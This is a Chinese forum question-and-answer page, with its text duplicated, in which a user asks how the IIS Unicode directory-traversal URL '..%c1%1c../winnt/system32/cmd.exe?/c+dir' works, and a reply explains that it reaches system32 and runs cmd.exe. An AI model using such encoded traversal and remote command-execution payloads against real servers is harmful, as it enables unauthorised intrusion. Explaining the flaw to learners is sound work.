关于unicode编码破绽,求教
日期:2014-05-16 浏览次数:20669 次
关于unicode编码漏洞,求教
http://xxxxxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这串url有几个地方看不懂,只知道大致是用命令行遍历文件夹
主要是这里..%c1%1c..,我知道%c1%1c是斜杠/的编码
但是整体放上去不明白http://x.x.x.x/scripts/../../winnt/system32/cmd.exe?/c+dir
还有就是那个scripts是否意味着只有scripts文件夹下的文件才能被访问,能否把scripts换成别的什么
------解决方案--------------------
http://xxxxxx/scripts/..%c1%1c../winnt/system32 这个就是找到WINDOWS目录,比如这样就定位到了
c:\winnt\system32\
然后执行cmd.exe
scripts 是当前网站下的一个目录
http://xxxxxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这串url有几个地方看不懂,只知道大致是用命令行遍历文件夹
主要是这里..%c1%1c..,我知道%c1%1c是斜杠/的编码
但是整体放上去不明白http://x.x.x.x/scripts/../../winnt/system32/cmd.exe?/c+dir
还有就是那个scripts是否意味着只有scripts文件夹下的文件才能被访问,能否把scripts换成别的什么
------解决方案--------------------
http://xxxxxx/scripts/..%c1%1c../winnt/system32 这个就是找到WINDOWS目录,比如这样就定位到了
c:\winnt\system32\
然后执行cmd.exe
scripts 是当前网站下的一个目录
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
